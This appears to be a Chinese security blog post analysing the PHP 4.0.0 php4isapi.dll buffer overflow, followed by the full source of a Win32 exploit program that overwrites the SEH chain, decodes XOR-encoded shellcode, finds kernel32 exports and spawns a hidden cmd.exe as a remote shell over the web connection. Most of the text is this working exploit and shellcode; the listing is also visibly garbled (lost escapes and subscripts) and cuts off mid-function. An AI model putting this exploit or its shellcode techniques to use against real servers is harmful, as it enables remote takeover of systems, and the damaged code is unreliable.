
php4.0.0远程溢出源代码分析与测试程序

2020-03-22 16:24:44
php4.0.0 刚出来的时候,我们测试发现 php4isapi.dll 有缓冲区溢出漏洞。下面是 php4isapi.c 的相关源代码,问题出在 sapi_isapi_register_server_variables() 中:取 SCRIPT_NAME/PATH_INFO 生成 PHP_SELF 时没有重新设置 variable_len,沿用了上一次 GetServerVariable 调用返回的长度,于是栈上的 static_variable_buf 可能被写越界:

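/*
 * Export the ISAPI server variables (plus PHP_SELF and the ALL_HTTP header
 * block) into the request's track_vars array.
 *
 * GetServerVariable() is an in/out call: *pLen goes in as the capacity of the
 * destination and comes back as the number of bytes written -- or, when the
 * call fails with ERROR_INSUFFICIENT_BUFFER, as the size required.  Every
 * call that reuses the fixed-size stack buffer therefore has to reset
 * variable_len first.
 *
 * PHP 4.0.0 did not do that for the PHP_SELF lookup (fixed in 4.0.3): if the
 * last entry of isapi_server_variables did not fit, variable_len was left
 * holding that entry's (larger) length, and IIS would then copy the
 * request-supplied SCRIPT_NAME / PATH_INFO into static_variable_buf with a
 * capacity bigger than the buffer -- a stack overflow reachable from a long
 * request path.  The author of this page notes that, because the overrun also
 * clobbers this function's parameters, a plain return-address overwrite is
 * not reliable and the published exploit targets the exception-handler chain
 * instead.
 */
static void sapi_isapi_register_server_variables(zval *track_vars_array ELS_DC SLS_DC PLS_DC)
{
	char static_variable_buf[ISAPI_SERVER_VAR_BUF_SIZE];
	char *variable_buf;
	DWORD variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
	char *variable;
	char *strtok_buf = NULL;
	LPEXTENSION_CONTROL_BLOCK lpECB;
	char **p = isapi_server_variables;
	char *self_var;

	lpECB = (LPEXTENSION_CONTROL_BLOCK) SG(server_context);

	/* Register the standard ISAPI variables.  A value that does not fit the
	 * stack buffer is re-fetched into a heap buffer of the reported size. */
	while (*p) {
		variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
		if (lpECB->GetServerVariable(lpECB->ConnID, *p, static_variable_buf, &variable_len)
			&& static_variable_buf[0]) {
			php_register_variable(*p, static_variable_buf, track_vars_array ELS_CC PLS_CC);
		} else if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
			variable_buf = (char *) emalloc(variable_len);
			if (lpECB->GetServerVariable(lpECB->ConnID, *p, variable_buf, &variable_len)
				&& variable_buf[0]) {
				php_register_variable(*p, variable_buf, track_vars_array ELS_CC PLS_CC);
			}
			efree(variable_buf);
		}
		p++;
	}

	/* PHP_SELF support: SCRIPT_NAME, or PATH_INFO when built for Zeus. */
#ifdef WITH_ZEUS
	self_var = "PATH_INFO";
#else
	self_var = "SCRIPT_NAME";
#endif
	/* FIX: never call with a stale length (this was the 4.0.0 overflow), and
	 * handle the too-long case exactly like the loop above instead of
	 * letting IIS write past the end of static_variable_buf. */
	variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
	if (lpECB->GetServerVariable(lpECB->ConnID, self_var, static_variable_buf, &variable_len)
		&& static_variable_buf[0]) {
		php_register_variable("PHP_SELF", static_variable_buf, track_vars_array ELS_CC PLS_CC);
	} else if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
		variable_buf = (char *) emalloc(variable_len);
		if (lpECB->GetServerVariable(lpECB->ConnID, self_var, variable_buf, &variable_len)
			&& variable_buf[0]) {
			php_register_variable("PHP_SELF", variable_buf, track_vars_array ELS_CC PLS_CC);
		}
		efree(variable_buf);
	}

	/* Register the internal bits of ALL_HTTP: the raw request header block,
	 * split below into "Name: value" entries. */
	variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
	if (lpECB->GetServerVariable(lpECB->ConnID, "ALL_HTTP", static_variable_buf, &variable_len)) {
		variable_buf = static_variable_buf;
	} else if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
		variable_buf = (char *) emalloc(variable_len);
		if (!lpECB->GetServerVariable(lpECB->ConnID, "ALL_HTTP", variable_buf, &variable_len)) {
			efree(variable_buf);
			return;
		}
	} else {
		return;
	}

	/* NOTE(review): the copy of this function on the page shows an empty
	 * delimiter here.  Every escape in the listing lost its backslash in
	 * transcription, so "\n" is presumably what the original passes; with ""
	 * the whole block would come back as a single token. */
	variable = php_strtok_r(variable_buf, "\n", &strtok_buf);
	while (variable) {
		char *colon = strchr(variable, ':');

		if (colon) {
			char *value = colon + 1;

			/* Skip blanks after the colon, split the line in place for the
			 * call, then put the colon back (the buffer may be the static one). */
			while (*value == ' ') {
				value++;
			}
			*colon = 0;
			php_register_variable(variable, value, track_vars_array ELS_CC PLS_CC);
			*colon = ':';
		}
		variable = php_strtok_r(NULL, "\n", &strtok_buf);
	}
	if (variable_buf != static_variable_buf) {
		efree(variable_buf);
	}
}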

因为溢出同时覆盖了本函数的形参,无法依靠函数正常返回来劫持 EIP,所以这里采用覆盖 SEH 异常处理结构的办法让 shellcode 获得控制。但各 Windows 版本在分发异常时寄存器所指向的结构并不统一(见下面代码中关于 ebx/esi/edi 的注释),可能需要根据被攻击系统的 Windows 版本调整相关地址。下面是测试代码(注意:转载时字符串转义中的反斜杠和若干数组下标已丢失,"/t" 为制表符,按原样无法编译):

/*
php4.0 overflow program phphack.c ver 1.0
copy by yuange <yuange@163.net> 2000.08.16

*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>   /* ISAPI definitions (HCONN etc.) used by shellcodefn */
// #define DEBUG

//#define RETEIPADDR eipwin2000
/* Length of the NOP run (fnendstr) that marks the end of each shellcode
 * function body; main() scans for it to know how many bytes to copy. */
#define FNENDLONG 0x08
/* Filler byte for the request buffer: 'B' (0x42) executes as INC EDX, so
 * control landing anywhere in the padding slides forward harmlessly. */
#define NOPCODE 'B' // INC EDX 0x90
/* Distance past OVERADD at which the encoded payload is written. */
#define NOPLONG 0x3c
#define BUFFSIZE 0x20000



/* Offset inside the request where the fake SEH records are placed.
 * NOTE(review): unparenthesised; only safe because it is used as a plain
 * initialiser (OVERADD) and never inside a larger expression. */
#define RETEIPADDRESS 0x900+4
#define SHELLBUFFSIZE 0x800
/* Size of the API name table (str in main); shellcodefn resolves entries
 * k = 1 .. SHELLFNNUMS-1. */
#define SHELLFNNUMS 9
/* XOR key applied to every payload byte before it goes into the URL;
 * shellcodefnlock undoes it on the target. */
#define DATAXORCODE 0xAA
/* Parameters of the keystream (x = x*0x100 % LOCKBIGNUM, low byte is the
 * key) that both ends use to mask the interactive cmd.exe traffic.
 * NOTE(review): LOCKBIGNUM is ~2^24.3, so x*0x100 can exceed INT_MAX --
 * signed overflow in C; both sides compute it identically, which is the
 * only reason the streams stay in sync. */
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139

#define SHELLPORT 0x1f90 //0x1f90=8080
#define WEBPORT 80

/* Decoder stub, lifted from the binary as raw bytes (see shellcodefnlock). */
void shellcodefnlock();
/* The payload itself, compiled as C and shipped XOR-encoded (see shellcodefn). */
void shellcodefn(char *ecb);

/* Patches MSVC's debug-build `call _chkesp` out of a copied function body. */
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

/*
 * Exploit driver.  Builds one HTTP GET whose request path is long enough to
 * overrun static_variable_buf in sapi_isapi_register_server_variables (the
 * PHP_SELF / SCRIPT_NAME lookup), sends it, then acts as a terminal for the
 * cmd.exe the payload spawns.
 *
 * Layout of the request buffer (offsets relative to buff, OVERADD =
 * RETEIPADDRESS):
 *   0 ..                      "GET /default.php4" (or argv[4]), then 'B' filler
 *   OVERADD-40 .. OVERADD+63  eight-byte pairs {"BBB-", eipjmpebx}: fake SEH
 *                             records whose handler is a "jmp ebx" gadget
 *   OVERADD+72                a 24-byte stub (see the comment on that line)
 *   OVERADD+NOPLONG+0x60      the decoder (0x80 bytes of shellcodefnlock)
 *   after the decoder         the XOR-encoded shellcodefn body + API name table
 *   0x40 bytes past that      " HTTP/1.1 HOST:" + server
 *
 * NOTE(review): this listing is transcription-damaged and does not compile
 * as shown -- every backslash in a string escape is gone ("x90" for "\x90",
 * "x0dx0a" for "\r\n"), "/t" stands for a tab, and array subscripts were
 * dropped from several expressions (`recvbuff!=' '`, `server==':'`,
 * `temp=shellcodebuff;`, `buff^=lockcharvar;`).  Comments describe the
 * evident intent.  gets() is used throughout with no bound.
 *
 * argv: [1] server (name or IP; a "scheme://" prefix and anything after a
 *           '/' are stripped), [2] web port (default 80), [4] replacement
 *           request line, [6] "debug" to run the buffer locally instead of
 *           sending it.
 * Returns 0; exits with 1 on WinSock, resolution or connect failure.
 */
int main(int argc, char **argv)
{
char *server;
/* API name table appended after the payload: NUL-separated names that
 * shellcodefn resolves with GetProcAddress (in the reverse order of its
 * FARPROC locals), followed by the command line, the "exit" line used to
 * stop cmd.exe, the "XORDATA" banner, and a "strend" sentinel that the
 * code below uses to find the table's length. */
char *str="LoadLibraryA""x0""CreatePipe""x0"
"CreateProcessA""x0""CloseHandle""x0"
"PeekNamedPipe""x0"
"ReadFile""x0""WriteFile""x0"
"Sleep""x0"
"cmd.exe""x0""x0dx0a""exit""x0dx0a""x0"
"XORDATA""x0"
"strend";
char buff1[]="GET /default.php4";
char buff2[]=" HTTP/1.1 HOST:";
/* End marker of each shellcode function (8 NOPs; the 9th is slack).  As
 * transcribed this is the ASCII text "x90x90...", which the memcmp scans
 * below can never find in real code. */
char *fnendstr="x90x90x90x90x90x90x90x90x90";
char SRLF[]="x0dx0ax00x00";


/* Candidate handler addresses, little-endian.  Per the author's annotations
 * each is a "push <reg>; ret" (or plain "ret") gadget in a system module.
 * Only eipjmpebx is used below; the rest are alternatives for other
 * Windows builds (see the translated note after them). */
char eipjmpesp[] ="xb7x0exfax7f";
// push esp
// ret
char eipexcept[]="xb8x0exfax7F";
// ret
char eipjmpesi[]="x08x88xfax7F";
char eipjmpedi[]="xbex8bxfax7F";
char eipjmpebx[]="x73x67xfax7F";
// push ebx
// ret
/*
Address of the "jmp ebx" gadget.  On Chinese WinNT and Chinese Win2000 the
address is fixed because it lives in the c_936.nls module.  On Win2000,
when an exception invokes the handler chain, ebx points at the exception
structure; on older WinNT builds it is esi (7ffa8808 usable), on later
builds edi (7ffa8bbe usable).
*/

char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
// unsigned
int i,j,k;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;   /* holds a 4-byte IPv4 address, not a socket (see memcpy below) */
WSADATA wsaData;
int offset=0;
int xordatabegin;   /* set once the payload's "XORDATA" banner has arrived */
int lockintvar1,lockintvar2;
char lockcharvar;
int OVERADD=RETEIPADDRESS;   /* offset of the fake SEH records in buff */
int result;

fprintf(stderr," PHP4.0 FOR WIN32 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr," copy by yuange 2000.8.16.");
fprintf(stderr," wellcome to my homepage http://yuange.yeah.net .");
fprintf(stderr," welcome to http://www.nsfocus.com .");
fprintf(stderr," usage: %s <server> [webport] ", argv[0]);


/* No server on the command line: prompt for one (unbounded gets into
 * recvbuff) and skip leading blanks.  Subscript lost: recvbuff[i]. */
if(argc <2){
fprintf(stderr," please enter the web server:");
gets(recvbuff);
for(i=0;i<strlen(recvbuff);++i){
/t if(recvbuff!=' ') break;
}

server=recvbuff;
if(i<strlen(recvbuff)) server+=i;
/*
fprintf(stderr," please enter the offset(0-3):");
gets(buff);
for(i=0;i<strlen(buff);++i){
/t if(buff!=' ') break;
}
offset=atoi(buff+i);
*/
}


/* WinSock 1.1 is all the plain TCP connect below needs. */
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
/tfprintf(stderr, "Your computer was not connected "
/t "to the Internet at the time that "
/t "this program was launched, or you "
/t "do not have a 32-bit "
/t "connection to the Internet.");
/texit(1);
}

/*
if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
if(offset<0||offset>3){
fprintf(stderr," offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}

*/



/* server was set by the prompt above when argc < 2; otherwise argv[1]. */
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];

/* Trim leading blanks (subscript lost: server[i]). */
for(i=0;i<strlen(server);++i){
if(server!=' ')
break;
}
if(i<strlen(server)) server+=i;

/* Strip a "scheme://" prefix: the first ':' followed by two slashes.
 * Each test compares '/' twice in this copy; the second was presumably
 * '\\' before its backslash was lost.  (server[i] subscript also lost.) */
for(i=0;i+3<strlen(server);++i){

if(server==':'){
/t if(server[i+1]=='/'||server[i+1]=='/'){
/t if(server[i+2]=='/'||server[i+2]=='/'){
/t/t server+=i;
/t/t server+=3;
/t/t break;
/t }
/t }
}
}
/* NUL out every '/' (or, presumably, '\\'); strlen shrinks as soon as the
 * first one is hit, so this truncates the host at the first slash. */
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='/'||server[i-1]=='/') server[i-1]=0;
}

/* Accept a dotted quad or a host name.  d_ip is declared SOCKET but used
 * as a 4-byte address; the memcpy presumably relies on SOCKET being 32 bits
 * wide on the Win32 target of the day. */
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf(" Can't get the ip of %s !",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}

if(argc>2) port=atoi(argv[2]);
else port=WEBPORT;
if(port==0) port=WEBPORT;

fd = socket(AF_INET, SOCK_STREAM,0);
/* Receive timeout for the first reply (WinSock SO_RCVTIMEO is in ms). */
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
/t
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf(" nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));

if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)
{/t
closesocket(fd);
WSACleanup( );
fprintf(stderr," connect err.");
gets(buff);
exit(1);
}

/* MSVC debug builds emit `call _chkesp` after inline asm; the empty asm
 * block here presumably exists just to make the compiler reference it.
 * Its address is recorded so cleanchkesp() can patch those calls out of
 * the copied payload.  If the symbol is an incremental-link thunk (first
 * byte 0xE9 = jmp rel32), follow it to the real body. */
_asm{
/t mov ESI,ESP
/t cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
/t ++chkespadd;
/t i=*(int*)chkespadd;
/t chkespadd+=i;
/t chkespadd+=4;
}

/* Locate the decoder the same way, then scan forward for the 8-NOP marker
 * at the top of shellcodefnlock. */
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
/t ++shellcodefnadd;
/t k=*(int *)shellcodefnadd;
/t shellcodefnadd+=k;
/t shellcodefnadd+=4;
}

for(k=0;k<=0x500;++k){
/t if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
/* Fill the entire request with the INC EDX filler, then put the request
 * line (argv[4] overrides the default) at the front -- no terminator, so
 * the path runs straight into the filler. */
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
// strcpy(buff,buff1);
// memset(buff+strlen(buff),NOPCODE,1);

/* Copy 0x80 bytes of the decoder, starting 4 bytes into its NOP marker,
 * to OVERADD+0x60+NOPLONG.  Unlike shellcodefn it is sent as-is, not
 * XOR-encoded. */
memcpy(buff+OVERADD+0x60+NOPLONG,shellcodefnadd+k+4,0x80);
// memcpy(buff+NOPLONG,shellcodefnadd+k+4,0x80);

/* Resolve shellcodefn through any jmp thunk and measure its body up to the
 * trailing NOP marker. */
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
/t ++shellcodefnadd;
/t k=*(int *)shellcodefnadd;
/t shellcodefnadd+=k;
/t shellcodefnadd+=4;
}


for(k=0;k<=0x1000;++k){
/t if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}

/* Copy the body, neutralise any `call _chkesp` inside it, then append the
 * API name table (everything in str before the "strend" sentinel). */
memcpy(shellcodebuff,shellcodefnadd,k); //j);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);


sendpacketlong=k+i;
/* Find where the decoder's trailing NOP run (its `shell:` label) landed in
 * buff; the encoded payload is written over it, which is exactly where the
 * decoder's call/pop leaves ESI and EDI. */
for(k=0;k<=0x200;++k){
/t if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;

///t if(memcmp(buff+NOPLONG+k,fnendstr,FNENDLONG)==0) break;

}




/* Encode: XOR each byte with DATAXORCODE.  Results that would break the URL
 * (<= 0x10, space, '.', '/', '0', '?', '%' -- one of the two '/' tests was
 * presumably '\\') are escaped as '0' followed by the byte plus 0x40;
 * shellcodefnlock reverses this ('0' -> take next byte, subtract 0x40).
 * '0' itself is escaped so the decoder cannot mistake data for the prefix.
 * Subscript lost: temp=shellcodebuff[i]. */
for(i=0;i<sendpacketlong;++i){
/t temp=shellcodebuff;
/t temp^=DATAXORCODE;
/t if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='/'||temp=='0'||temp=='?'||temp=='%'){
/t buff[OVERADD+NOPLONG+k]='0';

// buff[NOPLONG+k]='0';
/t ++k;
/t temp+=0x40;
/t }
/t buff[OVERADD+NOPLONG+k]=temp;

// buff[NOPLONG+k]=temp;
/t ++k;
}



// memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
// k+=sendpacketlong;


/*
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipjmpesp,4);
*/
/* Fake SEH records every 8 bytes from OVERADD-40 to OVERADD+63: "next"
 * pointer = "BBB-" (filler), handler = the jmp ebx gadget, which per the
 * author's note lands in the exception structure ebx points at. */
for(i=-40;i<0x40;i+=8){
memcpy(buff+OVERADD+i,"x42x42x42x2D",4);
memcpy(buff+OVERADD+i+4,eipjmpebx,4);
}
/* Stub after the records (i == 0x40 here): four 'B' fillers, twelve 0x61
 * bytes, then 5b ff 63 64 -- apparently pop ebx / jmp dword ptr [ebx+0x64]
 * -- and four more fillers.  Escapes lost in transcription. */
memcpy(buff+OVERADD+i+8,"x42x42x42x42x61x61x61x61x61x61x61x61x61x61x61x61x5bxffx63x64x42x42x42x42",24);



// fprintf(stderr," offset:%d",offset);



/*

192.168.8.48
if(argc>2){
server=argv[2];
if(strcmp(server,"win9x")==0){
/t memcpy(buff+OVERADD,eipwin9x,4);
/t fprintf(stderr," nuke win9x.");
}
if(strcmp(server,"winnt")==0){
/t memcpy(buff+OVERADD,eipwinnt,4);
/t fprintf(stderr," nuke winnt.");
}

}

*/

/* Finish the request 0x40 bytes past the end of the encoded payload:
 * " HTTP/1.1 HOST:" + server, then the final CRLF pair -- which in this
 * copy is an empty string (escapes lost), so as listed the request is
 * never properly terminated. */
sendpacketlong=k+OVERADD+i+NOPLONG;
//sendpacketlong=k+NOPLONG;

strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);

sendpacketlong=strlen(buff);
// buff[sendpacketlong]=0x90;
strcpy(buff+sendpacketlong,"");
/*
buff[sendpacketlong]=0x90;
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+sendpacketlong+OVERADD+i,eipexcept,4);
}
memcpy(buff+sendpacketlong+OVERADD+i,eipwinnt,4);

strcpy(buff+sendpacketlong+OVERADD+i+4,"xffx63x64");

strcpy(buff+sendpacketlong+OVERADD+i+20,"");
*/

// printf(" send buff:%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);

/*
#ifdef DEBUG
_asm{
lea esp,buff
/tadd esp,OVERADD
ret

}
#endif

*/
/* Local self-test: with argv[6]=="debug", point esp at the fake SEH area
 * and `ret` into it, running the buffer in this process instead of
 * sending it. */
if(argc>6) {
if(strcmp(argv[6],"debug")==0) {
/t _asm{
/t lea esp,buff
/t add esp,OVERADD
/t ret
/t }
}
}



/* Send the request once and wait (up to the receive timeout) for the
 * payload's "XORDATA" banner; k=-1 makes the terminal loop below prompt
 * for a command straight away. */
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr," send packet %d bytes.",j);
// fprintf(stderr," sned:%s ",buff);
send(fd,buff,j,0);
k=recv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
/t xordatabegin=1;
/t k=-1;
/t fprintf(stderr," ok!");
}
if(k>0){
/t recvbuff[k]=0;
/t fprintf(stderr," recv: %s",recvbuff);
}

}

/* Non-blocking from here on: recv() returning < 0 (nothing pending) is
 * the cue to read the next command from stdin. */
k=1;
ioctlsocket(fd, FIONBIO, &k);

// fprintf(stderr," now begin: ");

/* Seed both keystreams; lockintvar2 masks what is sent, lockintvar1
 * unmasks what is received (mirrored in shellcodefn). */
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;


/*
for(i=0;i<strlen(SRLF);++i){
/t SRLF^=DATAXORCODE;
}
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
*/
/* Interactive terminal.  Exits when recv() returns 0 (peer closed).
 * Until the banner has been seen, received bytes are printed raw; after
 * it, each byte is XORed with the next keystream byte.  The
 * `buff^=lockcharvar` lines lost their [i] subscript in transcription. */
k=1;
while(k!=0){
if(k<0){
/* Nothing pending: read a line (unbounded gets), append SRLF, mask k+2
 * bytes with the send keystream, send them. */
/t gets(buff);
/t k=strlen(buff);
/t memcpy(buff+k,SRLF,3);
// send(fd,SRLF,strlen(SRLF),0);
// fprintf(stderr,"%s",buff);
/t for(i=0;i<k+2;++i){
/t/tlockintvar2=lockintvar2*0x100;
/t/tlockintvar2=lockintvar2%LOCKBIGNUM;
/t/tlockcharvar=lockintvar2%0x100;
/t/tbuff^=lockcharvar; // DATAXORCODE;
///t buff^=DATAXORCODE;
/t }
/t send(fd,buff,k+2,0);
///t send(fd,SRLF,strlen(SRLF),0);
}
k=recv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0) {
/t xordatabegin=1;
/t k=-1;
}

if(k>0){
///t fprintf(stderr,"recv %d bytes",k);
/t if(xordatabegin==1){
/t for(i=0;i<k;++i){
/t/tlockintvar1=lockintvar1*0x100;
/t/tlockintvar1=lockintvar1%LOCKBIGNUM;
/t/tlockcharvar=lockintvar1%0x100;
/t/tbuff^=lockcharvar; // DATAXORCODE;
/t }
/t }
/t buff[k]=0;
/t fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr," the server close connect.");
gets(buff);   /* presumably waits for Enter so the console window stays open */
return(0);
}
/*
 * Decoder stub, written as inline asm so main() can lift its bytes out of
 * the compiled binary.  It goes into the request unencoded and runs first
 * on the target:
 *
 *   1. The 8 leading NOPs are the marker main() scans for; the ".php4?"
 *      bytes after them are presumably there so the padded path still looks
 *      like a .php4 request followed by a query string.
 *   2. jmp next / call getediadd / pop EDI is the call-pop trick: EDI = ESI =
 *      address of the `shell:` label, i.e. the bytes right after this stub,
 *      where main() placed the encoded shellcodefn body.
 *   3. ebx is pushed twice -- as shellcodefn's `ecb` argument and as a dummy
 *      return address (per the author's comments on those lines).
 *   4. looplock decodes in place until a 0 byte: '0' (0x30) means "take the
 *      next byte and subtract 0x40" (the escape main() applied to URL-unsafe
 *      bytes); every byte is then XORed with DATAXORCODE and stored.  EDI
 *      never gets ahead of ESI, so overwriting the source is safe.
 *   5. On the terminating 0 it jumps to `shell:` -- now the decoded
 *      shellcodefn -- which also doubles as the end marker main() looks for.
 */
void shellcodefnlock()
{
_asm{
/t nop
/t nop
/t nop
/t nop
/t nop
/t nop
/t nop
/t nop
/t _emit('.')

/t _emit('p')
/t _emit('h')
/t _emit('p')
/t _emit('4')
/t _emit('?')


/t jmp next
getediadd: pop EDI         // EDI = address of shell: (return address of the call below)
/t push EDI
/t pop ESI                 // ESI = EDI: read and write the same region
/t push ebx // ecb
/t push ebx/t // call shellcodefn ret address
/t xor ecx,ecx             // cl = 0 is the end-of-data byte
looplock: lodsb
/t cmp al,cl
/t jz shell                // done: run the decoded code
/t cmp al,0x30
/t jz clean0               // '0' prefix: escaped byte follows
sto:/t xor al,DATAXORCODE
/t stosb
/t jmp looplock
clean0: lodsb
/t sub al,0x40             // undo the +0x40 applied by main()'s encoder
/t jmp sto
next:/t call getediadd
shell:/t NOP
/t NOP
/t NOP
/t NOP
/t NOP
/t NOP
/t NOP
/t NOP
/t
}
}/t

/*
 * The payload proper, compiled as C and shipped as raw bytes (main() copies
 * its body up to the trailing NOP marker and XOR-encodes it).  It is
 * position independent: the only absolute address it needs, its own, comes
 * from `call getstradd` / `pop stradd`, which leaves stradd pointing just
 * past `nextcall` -- the spot where main() appended the API name table.
 *
 * Steps, in order:
 *   1. Builds an SEH record on the stack (except[0] = -1 end of chain,
 *      except[1] = stradd-7 = `execptprogram`) and hooks it at FS:[0], so a
 *      fault while probing memory is survivable: errprogram writes a resume
 *      address into offset 0xb8 of the handler's third argument (esp+0x0c,
 *      the CONTEXT; 0xb8 is Eip on x86) and returns 0, i.e.
 *      ExceptionContinueExecution.  The resume address is the return address
 *      of `call getexceptretadd`, which that routine stores into the
 *      0x11223344 placeholder (stradd-0x0e) -- the top of the scan loop.
 *   2. Scans from 0x77e10000 in 64 KiB steps (jumping to 0xbff00000 when it
 *      reaches 0x78000000) for a PE image whose export name is "KERNEL32",
 *      then walks its export name table for "GetProcAddress".  The multi-char
 *      constants are little-endian: 'NREK','23LE' = "KERNEL32", 'PteG','Acor'
 *      = "GetProcA".  The ordinal is offset by (Base-1), which only works
 *      when the export Base is 1 -- presumably the case for kernel32.
 *      NOTE(review): the loop condition is `imgbase<0xbffa0000,procgetadd==0`;
 *      the comma operator discards the bound, so only finding procgetadd
 *      stops the scan -- unmapped pages are survived via the SEH hook.
 *   3. Resolves SHELLFNNUMS-1 = 8 more APIs from the name table into
 *      apifnadd[k].  apifnadd has ONE element: k = 1..8 write past it into
 *      the neighbouring FARPROC locals (the names in main()'s str are the
 *      reverse of the declaration order here), so this depends on the
 *      compiler laying the locals out contiguously in declaration order.
 *   4. Creates two inheritable pipes and starts the command line that
 *      follows the API names ("cmd.exe") hidden, std handles on the pipes.
 *   5. Sends the 8-byte banner after the "exit" line ("XORDATA", which main()
 *      waits for) through the ISAPI WriteClient callback read from the ECB
 *      (offset 0x84; ReadClient at 0x88, ConnID at 0x08), then pumps:
 *      cmd output -> keystream XOR -> WriteClient, and ReadClient ->
 *      keystream XOR -> cmd stdin.  When ReadClient fails it writes the
 *      "exit" line to cmd three times and sleeps forever.
 *
 * The keystream (x = x*0x100 mod LOCKBIGNUM, low byte) mirrors main()'s:
 * lockintvar2 masks output, lockintvar1 unmasks input.  It only hides the
 * traffic from casual inspection; it is not encryption.
 *
 * ecb: pointer to the EXTENSION_CONTROL_BLOCK (whatever the decoder had in
 *      ebx).  Never returns.
 */
void shellcodefn(char *ecb)
{ char/tBuff[SHELLBUFFSIZE+2];
int/t *except[2];


FARPROC Sleepadd;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC/tprocloadlib;

FARPROC apifnadd[1];   /* overrun on purpose: [1..8] alias the locals above */
FARPROC procgetadd=0;
FARPROC writeclient= *(int *)(ecb+0x84);
FARPROC readclient = *(int *)(ecb+0x88);
HCONN ConnID = *(int *)(ecb+8) ;
char/t*stradd;   /* cursor into the NUL-separated string table after the code */
int/t imgbase,fnbase,k,l;
HANDLE libhandle; //libwsock32;
STARTUPINFO siinfo;

PROCESS_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int/t lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;



SECURITY_ATTRIBUTES sa;
/* call/pop to learn our own address; then register except[] as the head
 * of the SEH chain. */
_asm {/t jmp nextcall
/t getstradd: pop stradd
/t/t lea EDI,except
/t/t mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;

imgbase=0x77e00000;
/* Store this point as the resume address for faults during the scan. */
_asm{
/t call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
/t imgbase+=0x10000;
/t if(imgbase==0x78000000) imgbase=0xbff00000;
/t if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
/t/t fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
/t/t k=*(int *)(fnbase+0xc)+imgbase;
/t/t if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
/t/t libhandle=imgbase;
/t/t k=imgbase+*(int *)(fnbase+0x20);
/t/t for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
/t/t/tif(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor')
/t/t/t{
/t/t/t k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
/t/t/t k+=*(int *)(fnbase+0x10)-1;
/t/t/t k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
/t/t/t procgetadd=k+imgbase;
